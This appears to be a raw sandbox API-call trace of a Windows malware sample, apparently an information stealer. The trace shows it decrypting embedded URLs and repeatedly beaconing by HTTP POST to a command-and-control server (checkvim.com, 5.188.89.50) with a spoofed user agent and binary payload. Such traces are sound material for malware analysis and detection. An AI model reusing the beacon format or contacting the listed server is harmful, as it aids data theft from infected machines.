(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.827] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.828] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.829] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.829] GetProcessHeap () returned 0x840000 [0309.829] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0309.829] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0309.829] GetProcessHeap () returned 0x840000 [0309.829] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0309.829] GetProcessHeap () returned 0x840000 [0309.829] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0309.829] GetProcessHeap () returned 0x840000 [0309.829] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0309.829] GetProcessHeap () returned 0x840000 [0309.829] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa70 [0309.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.830] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0309.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.834] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0309.839] GetProcessHeap () returned 0x840000 [0309.839] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0309.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.840] CryptImportKey (in: hProv=0x86f248, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0309.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.840] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0309.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.841] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.841] GetProcessHeap () returned 0x840000 [0309.841] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0309.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.842] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa70, pdwDataLen=0x19f9a4 | out: pbData=0x87fa70, pdwDataLen=0x19f9a4) returned 1 [0309.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.843] CryptDestroyKey (hKey=0x87e930) returned 1 [0309.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.843] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0309.843] GetProcessHeap () returned 0x840000 [0309.843] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0309.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.844] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0309.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.845] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0309.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.846] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0309.846] GetProcessHeap () returned 0x840000 [0309.846] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0309.846] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0309.848] GetProcessHeap () returned 0x840000 [0309.848] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b48 [0309.848] socket (af=2, type=1, protocol=6) returned 0x524 [0309.848] connect (s=0x524, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0309.935] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0309.935] GetProcessHeap () returned 0x840000 [0309.935] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0309.936] GetProcessHeap () returned 0x840000 [0309.936] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0309.937] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0309.939] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0309.939] GetProcessHeap () returned 0x840000 [0309.939] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0309.939] GetProcessHeap () returned 0x840000 [0309.939] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0309.939] GetProcessHeap () returned 0x840000 [0309.939] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7a0 [0309.940] GetProcessHeap () returned 0x840000 [0309.940] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0309.941] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0309.942] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0309.942] GetProcessHeap () returned 0x840000 [0309.942] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0309.942] GetProcessHeap () returned 0x840000 [0309.942] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0309.943] send (s=0x524, buf=0x873a58*, len=237, flags=0) returned 237 [0309.943] send (s=0x524, buf=0x87eb58*, len=159, flags=0) returned 159 [0309.943] GetProcessHeap () returned 0x840000 [0309.943] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0309.944] recv (in: s=0x524, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0310.337] GetProcessHeap () returned 0x840000 [0310.337] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0310.337] GetProcessHeap () returned 0x840000 [0310.337] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0310.337] GetProcessHeap () returned 0x840000 [0310.337] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0310.337] GetProcessHeap () returned 0x840000 [0310.337] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0310.337] closesocket (s=0x524) returned 0 [0310.338] GetProcessHeap () returned 0x840000 [0310.338] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b48 | out: hHeap=0x840000) returned 1 [0310.338] GetProcessHeap () returned 0x840000 [0310.338] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0310.338] GetProcessHeap () returned 0x840000 [0310.338] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0310.338] GetProcessHeap () returned 0x840000 [0310.338] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0310.338] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xe4c) returned 0x524 [0310.340] Sleep (dwMilliseconds=0xea60) [0310.382] GetProcessHeap () returned 0x840000 [0310.382] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f830 [0310.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.383] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0310.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.390] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0310.402] GetProcessHeap () returned 0x840000 [0310.402] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0310.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.403] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4b0) returned 1 [0310.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.404] CryptSetKeyParam (hKey=0x87e4b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0310.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.405] CryptSetKeyParam (hKey=0x87e4b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.405] GetProcessHeap () returned 0x840000 [0310.405] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0310.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.417] CryptDecrypt (in: hKey=0x87e4b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f830, pdwDataLen=0x19f9a4 | out: pbData=0x87f830, pdwDataLen=0x19f9a4) returned 1 [0310.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.418] CryptDestroyKey (hKey=0x87e4b0) returned 1 [0310.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.419] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0310.419] GetProcessHeap () returned 0x840000 [0310.419] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0310.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.420] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0310.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.421] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0310.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.422] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0310.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.422] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0310.422] GetProcessHeap () returned 0x840000 [0310.422] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0310.423] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0310.423] GetProcessHeap () returned 0x840000 [0310.423] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0310.423] GetProcessHeap () returned 0x840000 [0310.423] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0310.423] GetProcessHeap () returned 0x840000 [0310.423] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0310.423] GetProcessHeap () returned 0x840000 [0310.423] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fab8 [0310.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.424] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0310.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.429] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f820) returned 1 [0310.434] GetProcessHeap () returned 0x840000 [0310.434] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0310.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.435] CryptImportKey (in: hProv=0x86f820, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5f0) returned 1 [0310.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.436] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0310.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.437] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.437] GetProcessHeap () returned 0x840000 [0310.437] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0310.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.438] CryptDecrypt (in: hKey=0x87e5f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fab8, pdwDataLen=0x19f9a4 | out: pbData=0x87fab8, pdwDataLen=0x19f9a4) returned 1 [0310.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.439] CryptDestroyKey (hKey=0x87e5f0) returned 1 [0310.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.440] CryptReleaseContext (hProv=0x86f820, dwFlags=0x0) returned 1 [0310.440] GetProcessHeap () returned 0x840000 [0310.440] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0310.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.440] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0310.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.441] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0310.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.442] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0310.442] GetProcessHeap () returned 0x840000 [0310.442] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0310.442] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0310.444] GetProcessHeap () returned 0x840000 [0310.444] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c58 [0310.444] socket (af=2, type=1, protocol=6) returned 0x528 [0310.444] connect (s=0x528, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0310.522] FreeAddrInfoW (pAddrInfo=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0310.522] GetProcessHeap () returned 0x840000 [0310.522] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f2d0 [0310.522] GetProcessHeap () returned 0x840000 [0310.522] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0310.523] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0310.524] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0310.524] GetProcessHeap () returned 0x840000 [0310.524] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0310.524] GetProcessHeap () returned 0x840000 [0310.524] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0310.524] GetProcessHeap () returned 0x840000 [0310.524] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fe18 [0310.524] GetProcessHeap () returned 0x840000 [0310.524] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0310.525] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0310.526] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0310.526] GetProcessHeap () returned 0x840000 [0310.526] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0310.526] GetProcessHeap () returned 0x840000 [0310.526] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0310.526] send (s=0x528, buf=0x873a58*, len=237, flags=0) returned 237 [0310.527] send (s=0x528, buf=0x87eb58*, len=159, flags=0) returned 159 [0310.527] GetProcessHeap () returned 0x840000 [0310.527] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0310.527] recv (in: s=0x528, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0310.915] GetProcessHeap () returned 0x840000 [0310.915] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0310.915] GetProcessHeap () returned 0x840000 [0310.915] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0310.915] GetProcessHeap () returned 0x840000 [0310.915] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0310.915] GetProcessHeap () returned 0x840000 [0310.915] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f2d0 | out: hHeap=0x840000) returned 1 [0310.915] closesocket (s=0x528) returned 0 [0310.915] GetProcessHeap () returned 0x840000 [0310.915] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c58 | out: hHeap=0x840000) returned 1 [0310.915] GetProcessHeap () returned 0x840000 [0310.915] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0310.915] GetProcessHeap () returned 0x840000 [0310.916] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fab8 | out: hHeap=0x840000) returned 1 [0310.916] GetProcessHeap () returned 0x840000 [0310.916] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0310.916] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x4d0) returned 0x528 [0310.917] Sleep (dwMilliseconds=0xea60) [0310.933] GetProcessHeap () returned 0x840000 [0310.933] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa70 [0310.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.934] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0310.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.941] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f930) returned 1 [0310.949] GetProcessHeap () returned 0x840000 [0310.949] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0310.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.950] CryptImportKey (in: hProv=0x86f930, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0310.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.951] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0310.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.952] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.953] GetProcessHeap () returned 0x840000 [0310.953] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0310.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.954] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa70, pdwDataLen=0x19f9a4 | out: pbData=0x87fa70, pdwDataLen=0x19f9a4) returned 1 [0310.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.955] CryptDestroyKey (hKey=0x87e370) returned 1 [0310.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.956] CryptReleaseContext (hProv=0x86f930, dwFlags=0x0) returned 1 [0310.956] GetProcessHeap () returned 0x840000 [0310.956] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0310.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.957] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0310.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.958] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0310.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.959] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0310.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.960] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0310.960] GetProcessHeap () returned 0x840000 [0310.960] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871290 [0310.961] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0310.961] GetProcessHeap () returned 0x840000 